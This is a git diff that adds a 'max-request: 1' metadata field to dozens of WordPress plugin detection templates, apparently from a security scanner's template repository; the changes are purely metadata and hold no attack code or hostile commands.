index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/header-footer/
metadata:
+ max-request: 1
plugin_namespace: header-footer
wpscan: https://wpscan.com/plugin/header-footer
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/health-check/
metadata:
+ max-request: 1
plugin_namespace: health-check
wpscan: https://wpscan.com/plugin/health-check
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/hello-dolly/
metadata:
+ max-request: 1
plugin_namespace: hello-dolly
wpscan: https://wpscan.com/plugin/hello-dolly
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/host-webfonts-local/
metadata:
+ max-request: 1
plugin_namespace: host-webfonts-local
wpscan: https://wpscan.com/plugin/host-webfonts-local
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/imagify/
metadata:
+ max-request: 1
plugin_namespace: imagify
wpscan: https://wpscan.com/plugin/imagify
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/imsanity/
metadata:
+ max-request: 1
plugin_namespace: imsanity
wpscan: https://wpscan.com/plugin/imsanity
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/insert-headers-and-footers/
metadata:
+ max-request: 1
plugin_namespace: insert-headers-and-footers
wpscan: https://wpscan.com/plugin/insert-headers-and-footers
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 43cb2ab09c..c8acf8c625 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/instagram-feed/
metadata:
+ max-request: 1
plugin_namespace: instagram-feed
wpscan: https://wpscan.com/plugin/instagram-feed
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/intuitive-custom-post-order/
metadata:
+ max-request: 1
plugin_namespace: intuitive-custom-post-order
wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/iwp-client/
metadata:
+ max-request: 1
plugin_namespace: iwp-client
wpscan: https://wpscan.com/plugin/iwp-client
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/jetpack/
metadata:
+ max-request: 1
plugin_namespace: jetpack
wpscan: https://wpscan.com/plugin/jetpack
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/kadence-blocks/
metadata:
+ max-request: 1
plugin_namespace: kadence-blocks
wpscan: https://wpscan.com/plugin/kadence-blocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/kirki/
metadata:
+ max-request: 1
plugin_namespace: kirki
wpscan: https://wpscan.com/plugin/kirki
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/leadin/
metadata:
+ max-request: 1
plugin_namespace: leadin
wpscan: https://wpscan.com/plugin/leadin
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/limit-login-attempts-reloaded/
metadata:
+ max-request: 1
plugin_namespace: limit-login-attempts-reloaded
wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/limit-login-attempts/
metadata:
+ max-request: 1
plugin_namespace: limit-login-attempts
wpscan: https://wpscan.com/plugin/limit-login-attempts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/litespeed-cache/
metadata:
+ max-request: 1
plugin_namespace: litespeed-cache
wpscan: https://wpscan.com/plugin/litespeed-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/loco-translate/
metadata:
+ max-request: 1
plugin_namespace: loco-translate
wpscan: https://wpscan.com/plugin/loco-translate
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/loginizer/
metadata:
+ max-request: 1
plugin_namespace: loginizer
wpscan: https://wpscan.com/plugin/loginizer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 6f06b49011..1c16a72d76 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/loginpress/
metadata:
+ max-request: 1
plugin_namespace: loginpress
wpscan: https://wpscan.com/plugin/loginpress
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/mailchimp-for-woocommerce/
metadata:
+ max-request: 1
plugin_namespace: mailchimp-for-woocommerce
wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/mailchimp-for-wp/
metadata:
+ max-request: 1
plugin_namespace: mailchimp-for-wp
wpscan: https://wpscan.com/plugin/mailchimp-for-wp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/mailpoet/
metadata:
+ max-request: 1
plugin_namespace: mailpoet
wpscan: https://wpscan.com/plugin/mailpoet
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/maintenance/
metadata:
+ max-request: 1
plugin_namespace: maintenance
wpscan: https://wpscan.com/plugin/maintenance
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/mainwp-child/
metadata:
+ max-request: 1
plugin_namespace: mainwp-child
wpscan: https://wpscan.com/plugin/mainwp-child
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/malcare-security/
metadata:
+ max-request: 1
plugin_namespace: malcare-security
wpscan: https://wpscan.com/plugin/malcare-security
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/megamenu/
metadata:
+ max-request: 1
plugin_namespace: megamenu
wpscan: https://wpscan.com/plugin/megamenu
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/members/
metadata:
+ max-request: 1
plugin_namespace: members
wpscan: https://wpscan.com/plugin/members
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/meta-box/
metadata:
+ max-request: 1
plugin_namespace: meta-box
wpscan: https://wpscan.com/plugin/meta-box
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 8e1cb46cf0..8881e23860 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ml-slider/
metadata:
+ max-request: 1
plugin_namespace: ml-slider
wpscan: https://wpscan.com/plugin/ml-slider
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/newsletter/
metadata:
+ max-request: 1
plugin_namespace: newsletter
wpscan: https://wpscan.com/plugin/newsletter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/nextend-facebook-connect/
metadata:
+ max-request: 1
plugin_namespace: nextend-facebook-connect
wpscan: https://wpscan.com/plugin/nextend-facebook-connect
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/nextgen-gallery/
metadata:
+ max-request: 1
plugin_namespace: nextgen-gallery
wpscan: https://wpscan.com/plugin/nextgen-gallery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ninja-forms/
metadata:
+ max-request: 1
plugin_namespace: ninja-forms
wpscan: https://wpscan.com/plugin/ninja-forms
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ocean-extra/
metadata:
+ max-request: 1
plugin_namespace: ocean-extra
wpscan: https://wpscan.com/plugin/ocean-extra
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/official-facebook-pixel/
metadata:
+ max-request: 1
plugin_namespace: official-facebook-pixel
wpscan: https://wpscan.com/plugin/official-facebook-pixel
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/one-click-demo-import/
metadata:
+ max-request: 1
plugin_namespace: one-click-demo-import
wpscan: https://wpscan.com/plugin/one-click-demo-import
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/optinmonster/
metadata:
+ max-request: 1
plugin_namespace: optinmonster
wpscan: https://wpscan.com/plugin/optinmonster
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index c45ef4bf89..0bc823830f 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/otter-blocks/
metadata:
+ max-request: 1
plugin_namespace: otter-blocks
wpscan: https://wpscan.com/plugin/otter-blocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/password-protected/
metadata:
+ max-request: 1
plugin_namespace: password-protected
wpscan: https://wpscan.com/plugin/password-protected
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/pdf-embedder/
metadata:
+ max-request: 1
plugin_namespace: pdf-embedder
wpscan: https://wpscan.com/plugin/pdf-embedder
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml
index a224d85727..7fbeea5917 100644
--- a/http/technologies/wordpress/plugins/photo-gallery.yaml
+++ b/http/technologies/wordpress/plugins/photo-gallery.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/photo-gallery/
metadata:
+ max-request: 1
plugin_namespace: photo-gallery
wpscan: https://wpscan.com/plugin/photo-gallery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/pixelyoursite/
metadata:
+ max-request: 1
plugin_namespace: pixelyoursite
wpscan: https://wpscan.com/plugin/pixelyoursite
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/polylang/
metadata:
+ max-request: 1
plugin_namespace: polylang
wpscan: https://wpscan.com/plugin/polylang
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/popup-builder/
metadata:
+ max-request: 1
plugin_namespace: popup-builder
wpscan: https://wpscan.com/plugin/popup-builder
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/popup-maker/
metadata:
+ max-request: 1
plugin_namespace: popup-maker
wpscan: https://wpscan.com/plugin/popup-maker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/post-smtp/
metadata:
+ max-request: 1
plugin_namespace: post-smtp
wpscan: https://wpscan.com/plugin/post-smtp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index 56d2e4efcd..829edad042 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/post-types-order/
metadata:
+ max-request: 1
plugin_namespace: post-types-order
wpscan: https://wpscan.com/plugin/post-types-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/premium-addons-for-elementor/
metadata:
+ max-request: 1
plugin_namespace: premium-addons-for-elementor
wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/pretty-link/
metadata:
+ max-request: 1
plugin_namespace: pretty-link
wpscan: https://wpscan.com/plugin/pretty-link
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/really-simple-captcha/
metadata:
+ max-request: 1
plugin_namespace: really-simple-captcha
wpscan: https://wpscan.com/plugin/really-simple-captcha
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/really-simple-ssl/
metadata:
+ max-request: 1
plugin_namespace: really-simple-ssl
wpscan: https://wpscan.com/plugin/really-simple-ssl
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/redirection/
metadata:
+ max-request: 1
plugin_namespace: redirection
wpscan: https://wpscan.com/plugin/redirection
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/redux-framework/
metadata:
+ max-request: 1
plugin_namespace: redux-framework
wpscan: https://wpscan.com/plugin/redux-framework
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/regenerate-thumbnails/
metadata:
+ max-request: 1
plugin_namespace: regenerate-thumbnails
wpscan: https://wpscan.com/plugin/regenerate-thumbnails
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/safe-svg/
metadata:
+ max-request: 1
plugin_namespace: safe-svg
wpscan: https://wpscan.com/plugin/safe-svg
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/seo-by-rank-math/
metadata:
+ max-request: 1
plugin_namespace: seo-by-rank-math
wpscan: https://wpscan.com/plugin/seo-by-rank-math
tags: tech,wordpress,wp-plugin,top-100,top-200
